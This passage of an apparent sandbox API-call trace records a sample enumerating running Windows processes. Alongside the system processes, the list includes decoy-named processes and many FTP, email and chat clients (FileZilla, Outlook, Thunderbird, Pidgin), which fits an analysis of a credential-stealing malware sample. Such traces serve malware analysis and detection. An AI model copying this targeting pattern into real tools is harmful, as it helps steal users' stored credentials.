pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0186.919] CloseHandle (hObject=0x17ec) returned 1 [0186.919] Sleep (dwMilliseconds=0x64) [0186.956] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17ec [0186.968] Process32First (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0187.006] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0187.008] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0187.010] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0187.038] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0187.039] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0187.041] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0187.043] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0187.044] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0187.046] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.047] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.049] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0187.051] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.052] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.054] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.055] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.057] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.059] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.061] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.063] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0187.064] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0187.105] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x33, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0187.108] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0187.110] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.112] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0187.113] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0187.115] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0187.116] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0187.118] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0187.120] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0187.121] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.123] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0187.124] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0187.127] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0187.128] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0187.130] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.132] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0187.134] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0187.136] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0187.137] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0187.139] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0187.141] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0187.177] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0187.179] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0187.181] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0187.183] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0187.185] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0187.187] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0187.189] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0187.191] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0187.193] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0187.195] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0187.197] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0187.199] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0187.200] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0187.202] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0187.203] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0187.205] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0187.207] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0187.209] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0187.211] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0187.214] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0187.216] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0187.218] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0187.221] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0187.223] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0187.225] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0187.227] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0187.229] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0187.231] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0187.233] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0187.235] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0187.237] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0187.239] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0187.241] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0187.243] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0187.245] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0187.247] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0187.249] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0187.300] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0187.302] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0187.304] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, 